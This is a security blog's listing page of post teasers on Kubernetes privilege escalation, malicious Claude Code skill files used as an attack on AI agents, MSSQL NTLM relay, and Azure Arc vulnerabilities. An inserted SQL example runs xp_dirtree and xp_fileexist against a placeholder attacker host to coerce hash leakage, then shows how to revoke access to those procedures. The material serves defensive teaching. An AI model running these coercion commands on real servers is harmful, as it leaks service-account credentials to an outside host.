Showing Posts From Infrastructure Security

Observing Privilege Escalation in Kubernetes

Kubernetes famously has a lot of moving parts; clusters get complicated quickly, and maintaining security best practice can be a challenge. What makes this harder is when good intentions to enhance security backfire and introduce risk. This post looks at observability tools in Kubernetes environments and how their positioning within a cluster, combined with the elevated privileges they are often granted, can expose privilege escalation paths to attackers.

Skill Issues: Compromising Claude Code with malicious skills & agents -- Part 1

With the increasing use of AI coding agents, can coding-agent skill files be exploited as an initial access mechanism, and how? This is part 1 of a three-part series exploring the attack surface and defensive recommendations.

Where There Is MSSQL, There Is A Way

Authentication coercion via xp_dirtree and other stored procedures is a well-known trick and is often blocked. What if we find other methods to capture Net-NTLMv2 hashes? As the latest organisation to join the MSSQL EPA and NTLM relay research, we are here to share our journey of exploiting MSSQL NTLM relay.
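As an added illustration, not code from the post above, here is the classic xp_dirtree coercion the teaser refers to, alongside the permission check and the blocking step defenders typically apply. The UNC host `attacker-host` and the share and file names are placeholders; xp_fileexist is a second commonly used coercion procedure, included here as an example of the "other stored procedures" mentioned. The teaser's point stands: revoking these named procedures does not remove the underlying coercion risk, it only removes the best-known entry points.

```sql
-- Added example, not from the original post. Host, share and file names are placeholders.
USE master;
GO

-- 1. The well-known coercion primitive: asking SQL Server to enumerate a UNC path
--    makes the SQL Server service account authenticate to the remote host over SMB,
--    which is where an attacker's listener captures the Net-NTLMv2 response.
EXEC master.dbo.xp_dirtree '\\attacker-host\share', 1, 1;
EXEC master.dbo.xp_fileexist '\\attacker-host\share\file.txt';
GO

-- 2. Check: who is allowed to execute these procedures?
--    A GRANT to public means any login on the instance can trigger the coercion.
SELECT o.name        AS procedure_name,
       p.state_desc  AS permission_state,
       p.permission_name,
       pr.name       AS grantee
FROM sys.database_permissions AS p
JOIN sys.objects             AS o  ON o.object_id = p.major_id
JOIN sys.database_principals AS pr ON pr.principal_id = p.grantee_principal_id
WHERE o.name IN ('xp_dirtree', 'xp_fileexist');
GO

-- 3. The common mitigation the teaser alludes to: remove the public grant so that
--    only members of sysadmin (which bypasses permission checks) can call them.
REVOKE EXECUTE ON dbo.xp_dirtree   FROM public;
REVOKE EXECUTE ON dbo.xp_fileexist FROM public;
GO
```

Run the check query before and after the REVOKE statements; the rows granting EXECUTE to public should disappear. A sysadmin login can still call both procedures, and any other procedure that resolves a UNC path is an equivalent coercion primitive, so treat this as a baseline hardening step rather than a complete fix.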

Azure Arc: A Double-Edged Sword

After receiving 5 CVEs and multiple acknowledgements from MSRC for reporting vulnerabilities leading to local privilege escalation (LPE) via various attack vectors, we are finally revealing some of our findings.